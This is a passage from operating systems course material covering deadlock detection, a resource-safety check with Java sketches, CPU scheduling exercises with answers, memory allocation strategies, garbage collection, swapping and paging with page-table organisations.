a safe state. If it does, the request is granted; otherwise, it is postponed until later. Habermann [1969]
has shown that executing the algorithm has complexity proportional to N^2, where N is the
number of processes, and since the algorithm is executed each time a resource request occurs, the
overhead is significant.
Deadlock Detection
Deadlock detection is the process of actually determining that a deadlock exists and identifying
the processes and resources involved in the deadlock.
The basic idea is to check allocations against resource availability for all possible allocation
sequences to determine whether the system is in a deadlocked state. Of course, the deadlock
detection algorithm is only half of this strategy. Once a deadlock is detected, there needs to be a
way to recover. Several alternatives exist:
 Temporarily preempt resources from deadlocked processes.
 Back off a process to some checkpoint, allowing preemption of a needed resource and
restarting the process at the checkpoint later.
 Successively kill processes until the system is deadlock free.
These methods are expensive in the sense that each iteration calls the detection algorithm until
the system proves to be deadlock free. The complexity of the algorithm is O(N^2), where N is the
number of processes. Another potential problem is starvation: the same process may be killed
repeatedly.
4.5 Implementation
Case Study 1. Solaris, Windows XP, and Linux implement multiple locking mechanisms because
these operating systems provide different locking mechanisms depending on the application
developers’ needs. Spinlocks are useful for multiprocessor systems where a thread can run in a
busy-loop (for a short period of time) rather than incurring the overhead of being put in a sleep
queue. Mutexes are useful for locking resources. Solaris 2 uses adaptive mutexes, meaning that
the mutex is implemented with a spin lock on multiprocessor machines. Semaphores and
condition variables are more appropriate tools for synchronization when a resource must be held
for a long period of time, since spinning is inefficient for a long duration.
Case Study 2. Suppose that a system is in an unsafe state. An algorithm that checks whether it is
possible for the processes to complete their execution without entering a deadlock state is
depicted below.
An unsafe state may not necessarily lead to deadlock; it just means that we cannot guarantee that
deadlock will not occur. Thus, it is possible that a system in an unsafe state may still allow all
processes to complete without deadlock occurring.
Consider the situation where a system has 12 resources allocated among processes P0, P1, and
P2. The resources are allocated according to the following policy:
Process   Max   Current   Need
P0        10    5         5
P1        4     2         2
P2        9     3         6
Table 4.4 Unsafe state may not lead to deadlock
Implementation of the above mentioned scenario is described as below.
// Safety-check sketch: n processes, m resource types.
// work[]           - instances of each resource currently available
// need[j][k]       - remaining demand of process j for resource k
// allocation[j][k] - instances of resource k currently held by process j (the
//                    "Current" column of Table 4.4)
// finish[j]        - true once process j is known to be able to finish
for (int i = 0; i < n; i++) {
    // find a process that can finish with the currently available resources
    for (int j = 0; j < n; j++) {
        if (!finish[j]) {
            boolean canFinish = true;
            for (int k = 0; k < m; k++) {
                if (need[j][k] > work[k])
                    canFinish = false;
            }
            if (canFinish) { // this process can finish
                finish[j] = true;
                // it eventually releases its currently held resources back to the pool
                for (int x = 0; x < m; x++)
                    work[x] += allocation[j][x];
            }
        }
    }
}
// The state is safe if and only if finish[j] is true for every j.
Currently there are two resources available. This system is in an unsafe state as process P1 could
complete, thereby freeing a total of four resources. But we cannot guarantee that processes P0
and P2 can complete. However, it is possible that a process may release resources before
requesting any further. For example, process P2 could release a resource, thereby increasing the
total number of resources to five. This allows process P0 to complete, which would free a total of
nine resources, thereby allowing process P2 to complete as well.
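A minimal driver for the safety check above, filled in with the numbers from Table 4.4 (12
resources of a single type, 2 currently available), might look as follows. The class and variable
names are illustrative.

// Sketch: running the safety check on the state of Table 4.4.
public class SafetyCheckDemo {
    public static void main(String[] args) {
        int n = 3, m = 1;                       // 3 processes, 1 resource type
        int[] work = {2};                       // available instances
        int[][] allocation = {{5}, {2}, {3}};   // current holdings of P0, P1, P2
        int[][] need = {{5}, {2}, {6}};         // remaining maximum demands
        boolean[] finish = new boolean[n];

        for (int i = 0; i < n; i++) {
            for (int j = 0; j < n; j++) {
                if (!finish[j]) {
                    boolean canFinish = true;
                    for (int k = 0; k < m; k++)
                        if (need[j][k] > work[k]) canFinish = false;
                    if (canFinish) {
                        finish[j] = true;
                        for (int x = 0; x < m; x++)
                            work[x] += allocation[j][x];
                    }
                }
            }
        }

        boolean safe = true;
        for (boolean f : finish) safe = safe && f;
        System.out.println(safe ? "state is safe" : "state is unsafe");
        // With these numbers only P1 can finish, so this prints "state is unsafe".
    }
}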
4.6 Exercises
1. A CPU scheduling algorithm determines an order for the execution of its scheduled
processes. Given n processes to be scheduled on one processor, how many possible different
schedules are there? Give a formula in terms of n.
Answer:
n! (n factorial = n × (n – 1) × (n – 2) × ... × 2 × 1).
2. Define the difference between preemptive and non-preemptive scheduling.
Answer:
Preemptive scheduling allows a process to be interrupted in the midst of its execution, taking
the CPU away and allocating it to another process. Non-preemptive scheduling ensures that a
process relinquishes control of the CPU only when it finishes with its current CPU burst.
3. Suppose that the following processes arrive for execution at the times indicated. Each process
will run the listed amount of time. In answering the questions, use non-preemptive
scheduling and base all decisions on the information you have at the time the decision must
be made.
Process   Arrival Time   Burst Time
P1        0.0            8
P2        0.4            4
P3        1.0            1
Table 4.5 Process scheduling exercise
(a) What is the average turnaround time for these processes with the FCFS scheduling
algorithm?
(b) What is the average turnaround time for these processes with the SJF scheduling
algorithm?
(c) The SJF algorithm is supposed to improve performance, but notice that we chose to run
process P1 at time 0 because we did not know that two shorter processes would arrive soon.
Compute what the average turnaround time will be if the CPU is left idle for the first 1 unit
and then SJF scheduling is used. Remember that processes P1 and P2 are waiting during this
idle time, so their waiting time may increase. This algorithm could be known as future
knowledge scheduling.
Answer:
a. 10.53
b. 9.53
c. 6.86
Remember that turnaround time is finishing time minus arrival time, so you have to subtract
the arrival times to compute the turnaround times. FCFS gives 11 if you forget to subtract arrival
times. (A small arithmetic check for these numbers is sketched at the end of this exercise set.)
4. What advantage is there in having different time-quantum sizes on different levels of a
multilevel queuing system?
Answer:
Processes that need more frequent servicing, for instance, interactive processes such as
editors, can be in a queue with a small time quantum. Processes with no need for frequent
servicing can be in a queue with a larger quantum, requiring fewer context switches to
complete the processing, and thus making more efficient use of the computer.
5. Suppose that a scheduling algorithm (at the level of short-term CPU scheduling) favors those
processes that have used the least processor time in the recent past. Why will this algorithm
favor I/O-bound programs and yet not permanently starve CPU-bound programs?
Answer:
It will favor the I/O-bound programs because of the relatively short CPU burst request by
them; however, the CPU-bound programs will not starve because the I/O-bound programs
will relinquish the CPU relatively often to do their I/O.
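As promised in the answer to exercise 3, a small arithmetic check of those turnaround-time
figures is sketched below; the schedules in the comments follow the reasoning given in that answer,
and the class name is illustrative.

// Sketch: turnaround time = finishing time - arrival time, averaged over P1-P3.
public class TurnaroundCheck {
    public static void main(String[] args) {
        // (a) FCFS: P1 runs 0-8, P2 runs 8-12, P3 runs 12-13
        double fcfs = ((8 - 0.0) + (12 - 0.4) + (13 - 1.0)) / 3;
        // (b) non-preemptive SJF: P1 runs 0-8, then P3 (shortest) 8-9, then P2 9-13
        double sjf = ((8 - 0.0) + (13 - 0.4) + (9 - 1.0)) / 3;
        // (c) idle until t = 1, then SJF with full knowledge: P3 1-2, P2 2-6, P1 6-14
        double future = ((14 - 0.0) + (6 - 0.4) + (2 - 1.0)) / 3;
        System.out.printf("FCFS=%.2f SJF=%.2f future=%.2f%n", fcfs, sjf, future);
        // matches the answers above (10.53, 9.53 and about 6.87) up to rounding
    }
}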
5. Memory Management
5.1 Memory Allocation
We first consider how to manage main (``core'') memory (also called random-access memory
(RAM)). In general, a memory manager provides two operations: Address allocate (int size); and
void deallocate (Address block);
The procedure allocate receives a request for a contiguous block of size bytes of memory and
returns a pointer to such a block. The procedure deallocate releases the indicated block, returning
it to the free pool for reuse. Sometimes a third procedure is also provided, Address
reallocate(Address block, int new_size); which takes an allocated block and changes its size,
either returning part of it to the free pool or extending it to a larger block. It may not always be
possible to grow the block without copying it to a new location, so reallocate returns the new
address of the block.
Memory allocators are used in a variety of situations. In UNIX, each process has a data segment.
There is a system call to make the data segment bigger, but no system call to make it smaller.
Also, the system call is quite expensive. Therefore, there are library procedures (called malloc,
free, and realloc) to manage this space. Only when malloc or realloc runs out of space is it
necessary to make the system call. The C++ operators new and delete are just dressed-up
versions of malloc and free. The Java operator new also uses malloc, and the Java runtime
system calls free when an object is found to be inaccessible during garbage collection.
The operating system also uses a memory allocator to manage space used for OS data structures
and given to ``user'' processes for their own use. As we saw before, there are several reasons why
we might want multiple processes, such as serving multiple interactive users or controlling
multiple devices. There is also a ``selfish'' reason why the OS wants to have multiple processes
in memory at the same time: to keep the CPU busy. Suppose there are n processes in memory
(this is called the level of multiprogramming) and each process is blocked (waiting for I/O) a
fraction p of the time. In the best case, when they ``take turns'' being blocked, the CPU will be
100% busy provided n(1-p) >= 1. For example, if each process is ready 20% of the time, p = 0.8
and the CPU could be kept completely busy with five processes. Of course, real processes aren't
so cooperative. In the worst case, they could all decide to block at the same time, in which case,
the CPU utilization (fraction of the time the CPU is busy) would be only 1 - p (20% in our
example). If each process decides randomly and independently when to block, the chance that
all n processes are blocked at the same time is only p^n, so CPU utilization is 1 - p^n. Continuing
our example in which n = 5 and p = 0.8, the expected utilization would be 1 - 0.8^5 = 1 - 0.32768 =
0.67232. In other words, the CPU would be busy about 67% of the time on average.
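The estimate 1 - p^n can be tabulated with a few lines of code; the sketch below simply evaluates
the formula for the example value p = 0.8.

// Sketch: CPU utilization 1 - p^n as the multiprogramming level n grows.
public class CpuUtilization {
    public static void main(String[] args) {
        double p = 0.8;                           // fraction of time a process is blocked
        for (int n = 1; n <= 10; n++) {
            double utilization = 1 - Math.pow(p, n);
            System.out.printf("n=%2d  utilization=%.3f%n", n, utilization);
        }
        // n = 5 gives about 0.672, i.e. roughly 67%, as computed in the text.
    }
}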
Algorithms for Memory Management
Clients of the memory manager keep track of allocated blocks (for now, we will not worry about
what happens when a client ``forgets'' about a block). The memory manager needs to keep track
of the ``holes'' between them. The most common data structure is a doubly linked list of holes.
This data structure is called the free list. This free list doesn't actually consume any space (other
than the head and tail pointers), since the links between holes can be stored in the holes
themselves (provided each hole is at least as large as two pointers). To satisfy an allocate(n)
request, the memory manager finds a hole of size at least n and removes it from the list. If the
hole is bigger than n bytes, it can split off the tail of the hole, making a smaller hole, which it
returns to the list. To satisfy a deallocate request, the memory manager turns the returned block
into a ``hole'' data structure and inserts it into the free list. If the new hole is immediately
preceded or followed by a hole, the holes can be coalesced into a bigger hole, as explained
below.
How does the memory manager know how big the returned block is? The usual trick is to put a
small header in the allocated block, containing the size of the block and perhaps some other
information. The allocate routine returns a pointer to the body of the block, not the header, so the
client doesn't need to know about it. The deallocate routine subtracts the header size from its
argument to get the address of the header. The client thinks the block is a little smaller than it
really is. So long as the client ``colors inside the lines'' there is no problem, but if the client has
bugs and scribbles on the header, the memory manager can get completely confused. This is a
frequent problem with malloc in UNIX programs written in C or C++. The Java system uses a
variety of runtime checks to prevent this kind of bug.
To make it easier to coalesce adjacent holes, the memory manager also adds a flag (called a
``boundary tag'') to the beginning and end of each hole or allocated block, and it records the size
of a hole at both ends of the hole.
Figure 5.1 Memory allocation
When the block is deallocated, the memory manager adds the size of the block (which is stored
in its header) to the address of the beginning of the block to find the address of the first word
following the block. It looks at the tag there to see if the following space is a hole or another
allocated block. If it is a hole, it is removed from the free list and merged with the block being
freed, to make a bigger hole. Similarly, if the boundary tag preceding the block being freed
indicates that the preceding space is a hole, we can find the start of that hole by subtracting its
size from the address of the block being freed (that's why the size is stored at both ends), remove
it from the free list, and merge it with the block being freed. Finally, we add the new hole back to
the free list. Holes are kept in a doubly-linked list to make it easy to remove holes from the list
when they are being coalesced with blocks being freed.
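A minimal sketch of the boundary-tag idea is shown below, using an int array as simulated
memory: every block or hole stores its size in both its first and last word (negative for allocated
blocks), so a freed block can inspect its right-hand neighbor in constant time. The layout and
names are illustrative, and coalescing with the preceding hole and free-list maintenance are
omitted for brevity.

// Sketch: boundary tags in a simulated memory of "words".
public class BoundaryTags {
    static int[] mem = new int[1024];        // simulated memory, one word per cell

    // write the tags for a block of `size` words starting at `addr`
    static void setTags(int addr, int size, boolean free) {
        int tag = free ? size : -size;
        mem[addr] = tag;                     // header
        mem[addr + size - 1] = tag;          // footer
    }

    // free a block and coalesce with a free right-hand neighbor, if any
    static void free(int addr) {
        int size = -mem[addr];               // allocated blocks store -size
        int next = addr + size;
        if (next < mem.length && mem[next] > 0) {
            size += mem[next];               // absorb the following hole
        }
        setTags(addr, size, true);
        // (a full allocator would also check mem[addr - 1] to coalesce with the
        //  preceding hole, and would update the free list accordingly)
    }

    public static void main(String[] args) {
        setTags(0, 1024, true);              // one big initial hole
        setTags(0, 100, false);              // pretend the first 100 words were allocated
        setTags(100, 924, true);             // the remainder is a hole
        free(0);                             // coalesces back into one 1024-word hole
        System.out.println("hole size after free: " + mem[0]);
    }
}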
How does the memory manager choose a hole to respond to an allocate request? At first, it might
seem that it should choose the smallest hole that is big enough to satisfy the request. This
strategy is called best fit. It has two problems. First, it requires an expensive search of the entire
free list to find the best hole (although fancier data structures can be used to speed up the search).
More importantly, it leads to the creation of lots of little holes that are not big enough to satisfy
any requests. This situation is called fragmentation, and is a problem for all memory-management
strategies, although it is particularly bad for best-fit. One way to avoid making little
holes is to give the client a bigger block than it asked for. For example, we might round all
requests up to the next larger multiple of 64 bytes. That doesn't make the fragmentation go away,
it just hides it. Unusable space in the form of holes is called external fragmentation, while
unused space inside allocated blocks is called internal fragmentation.
Another strategy is first fit, which simply scans the free list until a large enough hole is found.
Despite the name, first-fit is generally better than best-fit because it leads to less fragmentation.
There is still one problem: Small holes tend to accumulate near the beginning of the free list,
making the memory allocator search farther and farther each time. This problem is solved with
next fit, which starts each search where the last one left off, wrapping around to the beginning
when the end of the list is reached.
Yet another strategy is to maintain separate lists, each containing holes of a different size. This
approach works well at the application level, when only a few different types of objects are
created (although there might be lots of instances of each type). It can also be used in a more
general setting by rounding all requests up to one of a few pre-determined choices. For example,
the memory manager may round all requests up to the next power of two bytes (with a minimum
of, say, 64) and then keep lists of holes of size 64, 128, 256, etc. Assuming the largest request
possible is 1 megabyte, this requires only 15 lists (sizes 64 through 1M). This is the approach taken by most
implementations of malloc. This approach eliminates external fragmentation entirely, but internal
fragmentation may be as bad as 50% in the worst case, which occurs when all requests are one
byte more than a power of two.
Another problem with this approach is how to coalesce neighboring holes. One possibility is not
to try. The system is initialized by splitting memory up into a fixed set of holes (either all the
same size or a variety of sizes). Each request is matched to an ``appropriate'' hole. If the request
is smaller than the hole size, the entire hole is allocated to it anyhow. When the allocated block is
released, it is simply returned to the appropriate free list. Most implementations of malloc use a
variant of this approach.
An interesting trick for coalescing holes with multiple free lists is the buddy system. Assume all
blocks and holes have sizes which are powers of two and each block or hole starts at an address
that is an exact multiple of its size. Then each block has a ``buddy'' of the same size adjacent to
it, such that combining a block of size 2n with its buddy creates a properly aligned block of size
2n+1 For example, blocks of size 4 could start at addresses 0, 4, 8, 12, 16, 20, etc. The blocks at 0
and 4 are buddies; combining them gives a block at 0 of length 8. Similarly 8 and 12 are buddies,
16 and 20 are buddies, etc. The blocks at 4 and 8 are not buddies even though they are neighbors:
Combining them would give a block of size 8 starting at address 4, which is not a multiple of 8.
The address of a block's buddy can be easily calculated by flipping, in the binary representation of
the block's address, the single bit that corresponds to the block's size. For example, the pairs of
buddies (0,4), (8,12), (16,20) in binary are (00000,00100), (01000,01100), (10000,10100). In each
case, the two addresses in the pair differ only in the third bit from the right (the bit with value 4).
In short, you can find the address of the buddy of a block by taking the exclusive or of the address
of the block with its size. To
allocate a block of a given size, first round the size up to the next power of two and look on the
list of blocks of that size. If that list is empty, split a block from the next higher list (if that list is
empty, first add two blocks to it by splitting a block from the next higher list, and so on). When
deallocating a block, first check to see whether the block's buddy is free. If so, combine the block
with its buddy and add the resulting block to the next higher free list. As with allocations,
deallocations can cascade to higher and higher lists.
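The buddy-address calculation described above amounts to a single exclusive-or, as the following
small sketch illustrates (the class name is made up for illustration).

// Sketch: the buddy of a block is its address XORed with its power-of-two size.
public class BuddyAddress {
    static int buddyOf(int address, int size) {
        return address ^ size;               // flip the bit corresponding to the size
    }

    public static void main(String[] args) {
        System.out.println(buddyOf(0, 4));   // 4  : blocks at 0 and 4 are buddies
        System.out.println(buddyOf(8, 4));   // 12 : blocks at 8 and 12 are buddies
        System.out.println(buddyOf(4, 8));   // 12, not 8: 4 and 8 are neighbors, not buddies
    }
}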
Compaction and Garbage Collection
What do you do when you run out of memory? Any of these methods can fail because all the
memory is allocated, or because there is too much fragmentation. Malloc, which is being used to
allocate the data segment of a UNIX process, just gives up and calls the (expensive) OS call to
expand the data segment. A memory manager allocating real physical memory doesn't have that
luxury. The allocation attempt simply fails. There are two ways of delaying this catastrophe,
compaction and garbage collection.
Compaction attacks the problem of fragmentation by moving all the allocated blocks to one end
of memory, thus combining all the holes. Aside from the obvious cost of all that copying, there is
an important limitation to compaction: Any pointers to a block need to be updated when the
block is moved. Unless it is possible to find all such pointers, compaction is not possible.
Pointers can be stored in the allocated blocks themselves as well as in other places in the client of the
memory manager. In some situations, pointers can point not only to the start of blocks but also
into their bodies. For example, if a block contains executable code, a branch instruction might be
a pointer to another location in the same block. Compaction is performed in three phases. First,
the new location of each block is calculated to determine the distance the block will be moved.
Then each pointer is updated by adding to it the amount that the block it is pointing (in) to will
be moved. Finally, the data is actually moved. There are various clever tricks possible to
combine these operations.
Garbage collection finds blocks of memory that are inaccessible and returns them to the free list.
As with compaction, garbage collection normally assumes we find all pointers to blocks, both
within the blocks themselves and ``from the outside.'' If that is not possible, we can still do
``conservative'' garbage collection in which every word in memory that contains a value that
appears to be a pointer is treated as a pointer. The conservative approach may fail to collect
blocks that are garbage, but it will never mistakenly collect accessible blocks. There are three
main approaches to garbage collection: reference counting, mark-and-sweep, and generational
algorithms.
Reference counting keeps in each block a count of the number of pointers to the block. When the
count drops to zero, the block may be freed. This approach is only practical in situations where
there is some ``higher level'' software to keep track of the counts (it's much too hard to do by
hand), and even then, it will not detect cyclic structures of garbage: Consider a cycle of blocks,
each of which is only pointed to by its predecessor in the cycle. Each block has a reference count
of 1, but the entire cycle is garbage.
Mark-and-sweep works in two passes: First we mark all non-garbage blocks by doing a depth-first
search starting with each pointer ``from outside'':
void mark(Address b) {
    mark block b;
    for (each pointer p in block b) {
        if (the block pointed to by p is not marked)
            mark(p);
    }
}
The second pass sweeps through all blocks and returns the unmarked ones to the free list. The
sweep pass usually also does compaction, as described above.
There are two problems with mark-and-sweep. First, the amount of work in the mark pass is
proportional to the amount of non-garbage. Thus if memory is nearly full, it will do a lot of work
with very little payoff. Second, the mark phase does a lot of jumping around in memory, which is
bad for virtual memory systems, as we will soon see.
The third approach to garbage collection is called generational collection. Memory is divided
into spaces. When a space is chosen for garbage collection, all subsequent references to objects
in that space cause the object to be copied to a new space. After a while, the old space either
becomes empty and can be returned to the free list all at once, or at least becomes so sparse
that a mark-and-sweep garbage collection on it will be cheap. As an empirical fact, objects tend
to be either short-lived or long-lived. In other words, an object that has survived for a while is
likely to live a lot longer. By carefully choosing where to move objects when they are
referenced, we can arrange to have some spaces filled only with long-lived objects, which are
very unlikely to become garbage.
5.2 Swapping
When all else fails, allocate simply fails. In the case of an application program, it may be
adequate to simply print an error message and exit. An OS must be able to recover more gracefully.
We motivated memory management by the desire to have many processes in memory at once. In
a batch system, if the OS cannot allocate memory to start a new job, it can ``recover'' by simply
delaying starting the job. If there is a queue of jobs waiting to be created, the OS might want to
go down the list, looking for a smaller job that can be created right away. This approach
maximizes utilization of memory, but can starve large jobs. The situation is analogous to short-term
CPU scheduling, in which SJF gives optimal CPU utilization but can starve long bursts.
The same trick works here: aging. As a job waits longer and longer, increase its priority, until its
priority is so high that the OS refuses to skip over it looking for a more recently arrived but
smaller job.
An alternative way of avoiding starvation is to use a memory-allocation scheme with fixed
partitions (holes are not split or combined). Assuming no job is bigger than the biggest partition,
there will be no starvation, provided that each time a partition is freed, we start the first job in
line that is smaller than that partition. However, we have another choice analogous to the
difference between first-fit and best fit. Of course we want to use the ``best'' hole for each job
(the smallest free partition that is at least as big as the job), but suppose the next job in line is
small and all the small partitions are currently in use. We might want to delay starting that job
and look through the arrival queue for a job that better uses the partitions currently available.
This policy re-introduces the possibility of starvation, which we can combat by aging, as above.
If a disk is available, we can also swap blocked jobs out to disk. When a job finishes, we first
swap back jobs from disk before allowing new jobs to start. When a job is blocked (either
because it wants to do I/O or because our short-term scheduling algorithm says to switch to
another job), we have a choice of leaving it in memory or swapping it out. One way of looking at
this scheme is that it increases the multiprogramming level (the number of jobs ``in memory'') at
the cost of making it (much) more expensive to switch jobs. A variant of the MLFQ (multi-level
feedback queues) CPU scheduling algorithm is particularly attractive for this situation. The
queues are numbered from 0 up to some maximum. When a job becomes ready, it enters queue
zero. The CPU scheduler always runs a job from the lowest-numbered non-empty queue (i.e., the
priority is the negative of the queue number). It runs a job from queue i for a maximum of 2^i
quanta. If the job does not block or complete within that time limit, it is added to the next higher
queue. This algorithm behaves like RR with short quanta in that short bursts get high priority, but
does not incur the overhead of frequent swaps between jobs with long bursts. The number of
swaps is limited to the logarithm of the burst size.
5.3 Paging
Most modern computers have special hardware called a memory management unit (MMU). This
unit sits between the CPU and the memory unit. Whenever the CPU wants to access memory
(whether it is to load an instruction or load or store data), it sends the desired memory address to
the MMU, which translates it to another address before passing it on to the memory unit. The
address generated by the CPU, after any indexing or other addressing-mode arithmetic, is called
a virtual address, and the address it gets translated to by the MMU is called a physical address.
Figure 5.2 Paging in memory management
Normally, the translation is done at the granularity of a page. Each page is a power of 2 bytes
long, usually between 1024 and 8192 bytes. If virtual address p is mapped to physical address f
(where p is a multiple of the page size), then address p+o is mapped to physical address f+o for
any offset o less than the page size. In other words, each page is mapped to a contiguous region
of physical memory called a page frame.
Figure 5.3 Allocation of pages in page frames
The MMU allows a contiguous region of virtual memory to be mapped to page frames scattered
around physical memory making life much easier for the OS when allocating memory. Much
more importantly, however, it allows infrequently-used pages to be stored on disk. Here's how it
works: The tables used by the MMU have a valid bit for each page in the virtual address space. If
this bit is set, the translation of virtual addresses on a page proceeds as normal. If it is clear, any
attempt by the CPU to access an address on the page generates an interrupt called a page fault
trap. The OS has an interrupt handler for page faults, just as it has a handler for any other kind of
interrupt. It is the job of this handler to get the requested page into memory.
In somewhat more detail, when a page fault is generated for page p1, the interrupt handler does
the following:
 Find out where the contents of page p1 are stored on disk. The OS keeps this information
in a table. It is possible that this page isn't anywhere at all, in which case the memory
reference is simply a bug. In this case, the OS takes some corrective action such as killing
the process that made the reference (this is the source of the notorious message ``memory
fault -- core dumped''). Assuming the page is on disk:
 Find another page p2 mapped to some frame f of physical memory that is not used much.
 Copy the contents of frame f out to disk.
 Clear page p2's valid bit so that any subsequent references to page p2 will cause a page
fault.
 Copy page p1's data from disk to frame f.
 Update the MMU's tables so that page p1 is mapped to frame f.
 Return from the interrupt, allowing the CPU to retry the instruction that caused the
interrupt.
Page Tables
Conceptually, the MMU contains a page table which is simply an array of entries indexed by
page number. Each entry contains some flags (such as the valid bit mentioned earlier) and a
frame number. The physical address is formed by concatenating the frame number with the
offset, which are the low-order bits of the virtual address.
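As a concrete illustration of this lookup, here is a C-like sketch for 4K pages and a single-level table; pte_t, page_table, and raise_page_fault are invented names used only for this example.

#define PAGE_SHIFT 12                          /* 4K pages: the offset is the low 12 bits */
#define OFFSET_MASK ((1UL << PAGE_SHIFT) - 1)

typedef struct {
    unsigned valid : 1;                        /* the valid bit mentioned above */
    unsigned frame : 20;                       /* page frame number */
} pte_t;

extern pte_t page_table[];                     /* indexed by virtual page number */
extern void raise_page_fault(unsigned long vaddr);

unsigned long translate(unsigned long vaddr) {
    unsigned long vpn    = vaddr >> PAGE_SHIFT;     /* virtual page number */
    unsigned long offset = vaddr &  OFFSET_MASK;
    pte_t pte = page_table[vpn];
    if (!pte.valid)
        raise_page_fault(vaddr);               /* trap to the OS handler described earlier */
    return ((unsigned long)pte.frame << PAGE_SHIFT) | offset;  /* concatenate frame and offset */
}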
Figure 5.4 Pages table management (a)
There are two problems with this conceptual view. First, the lookup in the page table has to be
fast, since it is done on every single memory reference--at least once per instruction executed (to
fetch the instruction itself) and often two or more times per instruction. Thus the lookup is
always done by special-purpose hardware. Even with special hardware, if the page table is stored
in memory, the table lookup makes each memory reference generated by the CPU cause two
references to memory. Since in modern computers, the speed of memory is often the bottleneck
(processors are getting so fast that they spend much of their time waiting for memory), virtual
memory could make programs run twice as slowly as they would without it. We will look at
ways of avoiding this problem in a minute, but first we will consider the other problem: The page
tables can get large.
Suppose the page size is 4K bytes and a virtual address is 32 bits long (these are typical values
for current machines). Then the virtual address would be divided into a 20-bit page number and a
12-bit offset (because 2^12 = 4096 = 4K), so the page table would have to have 2^20 = 1,048,576
entries. If each entry is 4 bytes long, that would use up 4 megabytes of memory. And each
process has its own page table. Newer machines being introduced now generate 64-bit addresses.
Such a machine would need a page table with 4,503,599,627,370,496 entries!
Fortunately, the vast majority of the page table entries are normally marked ``invalid.'' Although
the virtual address may be 32 bits long and thus capable of addressing a virtual address space of
4 gigabytes, a typical process is at most a few megabytes in size, and each megabyte of virtual
memory uses only 256 page-table entries (for 4K pages).
There are several different page table organizations used in actual computers. One approach is to
put the page table entries in special registers. This was the approach used by the PDP-11
minicomputer introduced in the 1970's. The virtual address was 16 bits and the page size was 8K
bytes. Thus the virtual address consisted of 3 bits of page number and 13 bits of offset, for a total
of 8 pages per process. The eight page-table entries were stored in special registers. As an aside,
16-bit virtual addresses mean that any one process could access only 64K bytes of memory. Even
in those days that was considered too small, so later versions of the PDP-11 used a trick called
``split I/D space.'' Each memory reference generated by the CPU had an extra bit indicating
whether it was an instruction fetch (I) or a data reference (D), thus allowing 64K bytes for the
program and 64K bytes for the data. Putting page table entries in registers helps make the MMU
run faster (the registers were much faster than main memory), but this approach has a downside
as well. The registers are expensive, so this approach only works when the page table is very small. Also, each time
the OS wants to switch processes, it has to reload the registers with the page-table entries of the
new process.
A second approach is to put the page table in main memory. The (physical) address of the page
table is held in a register. The page field of the virtual address is added to this register to find the
page table entry in physical memory. This approach has the advantage that switching processes
is easy (all you have to do is change the contents of one register) but it means that every memory
reference generated by the CPU requires two trips to memory. It also can use too much memory,
as we saw above.
A third approach is to put the page table itself in virtual memory. The page number extracted
from the virtual address is used as a virtual address to find the page table entry. To prevent an
infinite recursion, this virtual address is looked up using a page table stored in physical memory.
As a concrete example, consider the VAX computer, introduced in the late 70's. The virtual
address of the VAX is 30 bits long, with 512-byte pages (probably too small even at that time!)
Thus the virtual address a consists of a 21-bit page number p and a nine-bit offset o. The page
number is multiplied by 4 (the size of a page-table entry) and added to the contents of the MMU
register containing the address of the page table. This gives a virtual address that is resolved using a page table in physical memory to get a frame number f. In more detail, the high-order bits of p index into a table to find the physical frame holding the relevant piece of the page table; that frame number, concatenated with the low bits of p, gives the physical address of a word containing f. The concatenation of f with o is the desired physical address.
Figure 5.5 Pages table management (b)
As you can see, another way of looking at this algorithm is that the virtual address is split into
fields that are used to walk through a tree of page tables. The SPARC processor (which you are
using for this course) uses a similar technique, but with one more level: The 32-bit virtual
address is divided into three index fields of 8, 6, and 6 bits and a 12-bit offset. The root of the
tree is pointed to by an entry in a context table, which has one entry for each process. The
advantage of these schemes is that they save on memory. For example, consider a VAX process
that only uses the first megabyte of its address space (2048 512-byte pages). Since each second
level page table has 128 entries, there will be 16 of them used. Adding to this the 64K bytes
needed for the first-level page table, the total space used for page tables is only 72K bytes, rather
than the 8 megabytes that would be needed for a one-level page table. The downside is that each
level of page table adds one more memory lookup on each reference generated by the CPU.
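Here is a sketch of a two-level walk of this kind, for a 32-bit address split into two 10-bit indices and a 12-bit offset (the same split used later in the x86 discussion); it reuses the pte_t type and raise_page_fault from the earlier sketch and is illustrative only.

unsigned long walk_two_level(pte_t **top_table, unsigned long vaddr) {
    unsigned long top = (vaddr >> 22) & 0x3ff;    /* index into the top-level table */
    unsigned long mid = (vaddr >> 12) & 0x3ff;    /* index into the second-level table */
    unsigned long off =  vaddr        & 0xfff;

    pte_t *second = top_table[top];               /* each entry points to a second-level table */
    if (second == NULL)
        raise_page_fault(vaddr);                  /* the whole region is unmapped */

    pte_t pte = second[mid];
    if (!pte.valid)
        raise_page_fault(vaddr);

    return ((unsigned long)pte.frame << 12) | off;
}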
A fourth approach is to use what is called an inverted page table. (Actually, the very first
computer to have virtual memory, the Atlas computer built in England in the late 50's used this
approach, so in some sense all the page tables described above are ``inverted.'') An ordinary page
table has an entry for each page, containing the address of the corresponding page frame (if any).
An inverted page table has an entry for each page frame, containing the corresponding page
number. To resolve a virtual address, the table is searched to find an entry that contains the page
number. The good news is that an inverted page table only uses a fixed fraction of memory. For
example, if a page is 4K bytes and a page-table entry is 4 bytes, there will be exactly 4 bytes of page table for each 4096 bytes of physical memory. In other words, less than 0.1% of memory
will be used for page tables. The bad news is that this is by far the slowest of the methods, since
it requires a search of the page table for each reference. The original Atlas machine had special
hardware to search the table in parallel, which was reasonable since the table had only 2048
entries.
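A sketch of an inverted-table lookup; inverted_table, NFRAMES, and the linear search are only illustrative (the Atlas searched all entries in parallel in hardware, and software implementations hash on the pair of process and page number instead, as noted below).

struct ipt_entry { int valid; int pid; unsigned long vpn; };   /* one entry per page frame */
extern struct ipt_entry inverted_table[];
extern const long NFRAMES;

long lookup_inverted(int pid, unsigned long vpn) {
    for (long f = 0; f < NFRAMES; f++)
        if (inverted_table[f].valid &&
            inverted_table[f].pid == pid &&
            inverted_table[f].vpn == vpn)
            return f;                              /* the frame holding this page */
    return -1;                                     /* not resident: page fault */
}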
All of the methods considered thus far can be sped up by using a trick called caching. We will be
seeing many more examples of caching used to speed things up throughout the course. In
fact, it has been said that caching is the only technique in computer science used to improve
performance. In this case, the specific device is called a translation lookaside buffer (TLB). The
TLB contains a set of entries, each of which contains a page number, the corresponding page
frame number, and the protection bits. There is special hardware to search the TLB for an entry
matching a given page number. If the TLB contains a matching entry, it is found very quickly
and nothing more needs to be done. Otherwise we have a TLB miss and have to fall back on one
of the other techniques to find the translation. However, we can take that translation we found
the hard way and put it into the TLB so that we find it much more quickly the next time. The
TLB has a limited size, so to add a new entry, we usually have to throw out an old entry. The
